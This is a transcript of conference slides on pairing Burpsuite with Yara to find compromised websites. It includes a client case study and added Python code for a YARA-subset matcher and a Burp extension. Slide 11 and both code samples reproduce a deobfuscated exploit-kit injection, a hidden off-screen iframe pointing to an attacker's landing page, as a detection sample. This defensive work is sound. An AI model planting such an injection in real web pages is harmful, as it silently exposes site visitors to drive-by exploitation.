Burpsuite yara

Slides for OWASP DC Meetup - June 2016
"Identifying Compromised Web Applications with Burpsuite and Yara" by Ian Duffy

1. Burpsuite / Yara Integration
   Ian Duffy
   Polito, Inc.
   @politoinc

2. Introduction
   • Who am I?
   • About Burpsuite and Yara
   • Case study: A compromised website
   • Plugin development
   • Future Roadmap
   • Questions

3. Who am I?
   • Former USAF network defender
   • Current cybersecurity consultant for Polito
   • Background in penetration testing (traditional and web application) as well as malware analysis
   • Current duties involve malware analysis and threat hunting

4. Burpsuite
   • Burpsuite is a MITM proxy tool for viewing, intercepting, modifying, and transmitting HTTP(S) requests and responses.
   • Allows the user to view all web content down to the byte level, to include static pages, JavaScript, JSON, WebSockets, and much more.
   • Includes several tools for assessing the security of web applications

5. BurpSuite

6. Yara
   • Yara is a sophisticated pattern matching tool
   • Specifies a language for describing strings, binary / hexadecimal data, file offset information, and file structure information in order to write pattern matching rules
   • Rules can be run against one or many files or data streams in order to find matches

7. Yara Rules Example
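
Slides 6 and 7 describe the Yara rule language, but the example rule itself survives only as a slide image. The following is an added example, not code from the deck or from the Polito plugin: a small pure-Python parser and matcher for a subset of YARA rule syntax (quoted text strings with `nocase`, hex strings with `??` wildcard bytes, regular-expression literals, and conditions built from `and`/`or`, parentheses, `$name` references and `all of them` / `any of them` / `N of them`). It is run over constructed responses, one of which carries the hidden-iframe snippet recovered on slide 11. The `example.test` URLs, the `about.html` page and the rule text are constructed for this example; the real yara tool supports far more than this subset and is what an investigation would actually use.

```python
import re

# Constructed sample "responses" standing in for pages Burp's spider collected; the
# injected snippet in index.html is the deobfuscated JavaScript shown on slide 11.
SAMPLE_RESPONSES = {
    "http://example.test/index.html": (
        "<html><body><h1>Welcome</h1><script>document.write('<style>.ddidfodevxgsz"
        "{position:absolute;top:-907px;width:300px;height:300px;}</style><div class="
        '"ddidfodevxgsz"><iframe src="http://ryonfmza.buildera.cf/consent/knife-lodge-'
        '19720974" width="250" height="250"></iframe></div>\');</script></body></html>'
    ),
    "http://example.test/about.html": "<html><body><p>About us</p></body></html>",
}

# A rule in the subset of YARA syntax that parse_rules() understands (constructed).
RULES = r'''
rule hidden_iframe_injection : exploitkit
{
    strings:
        $offscreen = /position:absolute;top:-\d{3,4}px/
        $iframe    = { 3c 69 66 72 61 6d 65 20 73 72 63 3d }   // "<iframe src="
        $docwrite  = "document.write(" nocase
    condition:
        $offscreen and ($iframe or $docwrite)
}
'''

RULE_RE = re.compile(r'rule\s+(\w+)[^{]*\{(.*?)\n\}', re.S)
STRING_RE = re.compile(r'^\s*\$(\w+)\s*=\s*(.+?)\s*$', re.M)

def _compile_string(defn):
    """Turn one YARA string definition into a compiled regex over bytes."""
    defn = re.sub(r'\s*//.*$', '', defn)               # drop a trailing // comment
    if defn.startswith('{'):                            # hex string; ?? is a wildcard byte
        tokens = defn[1:defn.index('}')].split()
        pattern = b''.join(b'.' if t == '??' else re.escape(bytes([int(t, 16)])) for t in tokens)
        return re.compile(pattern, re.S)
    if defn.startswith('/'):                            # regular expression literal
        return re.compile(defn[1:defn.rindex('/')].encode(), re.S)
    m = re.match(r'"((?:[^"\\]|\\.)*)"(.*)', defn)      # quoted text string plus modifiers
    text = m.group(1).encode().decode('unicode_escape').encode('latin-1')
    return re.compile(re.escape(text), re.I if 'nocase' in m.group(2) else 0)

def parse_rules(source):
    """Parse rule text into (name, {string_name: regex}, condition_text) triples."""
    rules = []
    for name, body in RULE_RE.findall(source):
        head, _, condition = body.partition('condition:')
        strings = {n: _compile_string(d) for n, d in STRING_RE.findall(head.partition('strings:')[2])}
        rules.append((name, strings, condition.strip()))
    return rules

def _eval_condition(condition, hits):
    """Recursive-descent evaluation of and/or, parentheses, $name, and 'N of them'."""
    toks = re.findall(r'\(|\)|\$\w+|\w+', condition)
    def atom():
        tok = toks.pop(0)
        if tok == '(':
            value = expr()
            toks.pop(0)                                 # the closing parenthesis
            return value
        if tok.startswith('$'):
            return bool(hits[tok[1:]])
        if toks[:1] == ['of']:                          # all of them / any of them / 2 of them
            del toks[:2]
            needed = len(hits) if tok == 'all' else 1 if tok == 'any' else int(tok)
            return sum(1 for offsets in hits.values() if offsets) >= needed
        raise ValueError('unsupported condition token: %s' % tok)
    def term():
        value = atom()
        while toks[:1] == ['and']:
            toks.pop(0)
            value = atom() and value
        return value
    def expr():
        value = term()
        while toks[:1] == ['or']:
            toks.pop(0)
            value = term() or value
        return value
    return expr()

def scan(data, rules):
    """Return {rule_name: {string_name: [offsets]}} for each rule whose condition holds."""
    matched = {}
    for name, strings, condition in rules:
        hits = {s: [m.start() for m in rx.finditer(data)] for s, rx in strings.items()}
        if _eval_condition(condition, hits):
            matched[name] = {s: offs for s, offs in hits.items() if offs}
    return matched

def scan_responses(responses, rule_source=RULES):
    """Scan every captured body; report only the URLs that triggered at least one rule."""
    rules = parse_rules(rule_source)
    results = ((url, scan(body.encode('utf-8'), rules)) for url, body in responses.items())
    return {url: found for url, found in results if found}
```

Running `scan_responses(SAMPLE_RESPONSES)` flags only `index.html`, with the offsets of all three strings; `about.html` never triggers the rule because the off-screen CSS is absent. The condition evaluator deliberately consumes every token before combining results, so the side-effect-free short-circuiting of Python's `and`/`or` cannot desynchronise the parser.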

8. Case Study
   • Client contacts Polito and says that their IT department is getting phone calls stating that their website is causing “FireEye Alerts” and is likely compromised
   • Polito is asked to investigate and determine:
     – Whether the site is actually compromised
     – If so, scope, scale, and impact of the compromise

9. Case Study
   • We request a tarball of the current webroot folder and a dump of any backend CMS databases
   • In the meantime we begin spidering the website using Burpsuite…

10. Case Study
   Highly obfuscated JavaScript – interesting…

11. Case Study
   • The obfuscated JavaScript is consistent with the Angler Exploit Kit, which matches the alerts reported by our client’s IT department
   • After deobfuscation of the JavaScript we see the following:

     document.write('<style>.ddidfodevxgsz{position:absolute;top:-907px;width:300px;height:300px;}</style><div class="ddidfodevxgsz"><iframe src="http://ryonfmza.buildera.cf/consent/knife-lodge-19720974" width="250" height="250"></iframe></div>');

12. Case Study

13. Case Study
   • Problems:
     – How do we identify whether this EK landing page / malicious JavaScript has been inserted into any other pages on the site?
     – How do we identify whether the attackers have left themselves a back door?

14. Case Study
   • Possible Solutions
     – Wait for three days before client can get tarball of their website uploaded to our SFTP server
     – Manually search through online web content
     – Write something to automate our searching

15. Writing Burpsuite Plugins
   • Burpsuite supports plugins in Java, Ruby, and Python
     – Ruby requires JRuby
     – Python requires Jython
   • We decided to use Python to develop our Yara integration for expedience

16. The Plugin…
   • Burpsuite specifies several interfaces for performing various tasks
   • Depending on what functionality we are trying to implement, we must implement one or more of those interfaces
   • The interfaces specify methods that must be implemented in order to handle events from the Burpsuite UI

17. The Plugin…
   • Each of the interfaces requires specific methods be implemented
     – IBurpExtender requires a method named registerExtenderCallbacks
     – ITab requires methods named getTabCaption and getUIComponent
   • Documentation for the interfaces is available at:
     – https://portswigger.net/burp/extender/api/index.html

18. The Plugin…
   • Our basic use case was as follows:
     – Burpsuite user spiders a website to retrieve as much of the content as possible
     – User right-clicks on website in Burp UI and selects “Scan with Yara”
     – Yara is used to scan the content of the web requests and responses
     – Results displayed to user in a Tab

19. Jython
   • Jython is a hybrid between Java and Python
   • You can “import” Java classes, instantiate Java objects, and call their methods via Python code:

20. Jython
   • Java objects are instantiated by calling a constructor method with the same name as the class
     – No “new” keyword like in Java
     – Parameters to the constructors are the same
   • Once instantiated, class objects can be used just as with Java
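
Slides 16 through 20 name the interfaces a Burp extension implements and explain how Jython instantiates Java objects. The skeleton below is an added example and not the Polito Yara-Scanner plugin's code: it wires IBurpExtender, ITab and IContextMenuFactory together, adds the “Scan with Yara” right-click entry from slide 18, walks Burp's site map under the selected URL, and hands each response body to the yara command-line tool. Assumptions, all labelled in the code: `yara` is on PATH and prints one `rule_name file` line per match, `RULES_PATH` is a placeholder for the rules file, Burp's Java `byte[]` arrives in Jython as an `array` whose `tostring()` yields the raw bytes, and when the `burp`/`javax.swing` packages are absent (plain CPython, as in a unit test) stand-in base classes are used so the pure-Python scanning helpers can still be exercised via `demo()`.

```python
import os
import subprocess
import tempfile

try:  # real Burp/Jython runtime
    from burp import IBurpExtender, ITab, IContextMenuFactory
    from javax.swing import JMenuItem, JScrollPane, JTextArea
    from java.util import ArrayList
    IN_BURP = True
except ImportError:  # plain CPython (tests, experiments): stand-in base classes
    IN_BURP = False
    class IBurpExtender(object): pass
    class ITab(object): pass
    class IContextMenuFactory(object): pass

RULES_PATH = "/path/to/rules.yar"  # placeholder: the rules file handed to the yara CLI

def run_yara_cli(body, rules_path=RULES_PATH):
    """Scan one response body with the yara command-line tool (assumed to be on PATH).
    Assumption: yara prints one line per matching rule, 'rule_name scanned_file'."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(body)
        path = tmp.name
    try:
        out = subprocess.check_output(["yara", rules_path, path])
        return sorted({line.split()[0] for line in out.decode("utf-8").splitlines() if line.strip()})
    finally:
        os.unlink(path)

def scan_entries(entries, match_fn):
    """entries: (url, raw_response_or_None, body_offset) triples as pulled from the site map;
    match_fn(body) -> list of rule names. Returns {url: [rule names]} for hits only."""
    report = {}
    for url, raw, body_offset in entries:
        if raw is None:  # the spider queued the request but no response was captured
            continue
        names = match_fn(raw[body_offset:])
        if names:
            report[url] = names
    return report

def format_report(report):
    """Render the report as the text shown in the extension's tab."""
    if not report:
        return "No Yara matches."
    return "\n".join("%s\n    %s" % (url, ", ".join(report[url])) for url in sorted(report))

class BurpExtender(IBurpExtender, ITab, IContextMenuFactory):
    # IBurpExtender: Burp calls this once when the extension is loaded
    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("Yara Scanner (example)")
        self._output = JTextArea()                # Jython: constructor call, no "new" keyword
        self._output.setEditable(False)
        self._panel = JScrollPane(self._output)
        callbacks.addSuiteTab(self)
        callbacks.registerContextMenuFactory(self)

    # ITab
    def getTabCaption(self):
        return "Yara"

    def getUIComponent(self):
        return self._panel

    # IContextMenuFactory: the right-click entry described on slide 18
    def createMenuItems(self, invocation):
        items = ArrayList()
        items.add(JMenuItem("Scan with Yara", actionPerformed=lambda e: self.scan(invocation)))
        return items

    def scan(self, invocation):
        """Collect every site-map entry under the selected URL(s) and scan the bodies."""
        entries = []
        for message in invocation.getSelectedMessages():
            prefix = str(self._helpers.analyzeRequest(message).getUrl())
            for item in self._callbacks.getSiteMap(prefix):
                url = str(self._helpers.analyzeRequest(item).getUrl())
                raw = item.getResponse()
                if raw is None:
                    entries.append((url, None, 0))
                else:
                    offset = self._helpers.analyzeResponse(raw).getBodyOffset()
                    entries.append((url, raw.tostring(), offset))  # assumption: byte[] -> array -> str
        self._output.setText(format_report(scan_entries(entries, run_yara_cli)))

def demo():
    """Stand-alone run outside Burp: constructed responses and a substring check standing in for yara."""
    def http(body):
        return b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n" + body
    offset = len(http(b""))  # what IResponseInfo.getBodyOffset() would report
    page = (b'<html><div class="ddidfodevxgsz"><iframe src="http://ryonfmza.buildera.cf/'
            b'consent/knife-lodge-19720974"></iframe></div></html>')
    entries = [
        ("http://example.test/index.html", http(page), offset),
        ("http://example.test/about.html", http(b"<html><p>About us</p></html>"), offset),
        ("http://example.test/pending", None, 0),
    ]
    def stand_in(body):
        return ["hidden_iframe"] if b"<iframe" in body else []
    return scan_entries(entries, stand_in)
```

Keeping the Burp-facing class thin and the scanning in plain functions is what makes the extension testable without loading it into Burp: `demo()` runs under CPython and returns `{"http://example.test/index.html": ["hidden_iframe"]}`, while inside Burp the same `scan_entries` is fed real site-map entries and `run_yara_cli`.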

21. Demonstration
   Live demo time – this always works!

22. Future Roadmap
   • Things that we are looking into:
     – Live Yara scanning as you surf
     – Persistent configuration settings
     – Multiple rules files
   • Your thoughts and feature requests are most welcome!

23. Grab a Copy
   • Plugin is available on our Github site:
   • https://github.com/PolitoInc/Yara-Scanner
   • Please send any feedback to ian@politoinc.com

24. Questions?
   Ian Duffy
   Polito, Inc.
   @politoinc
   www.politoinc.com
   Thank You!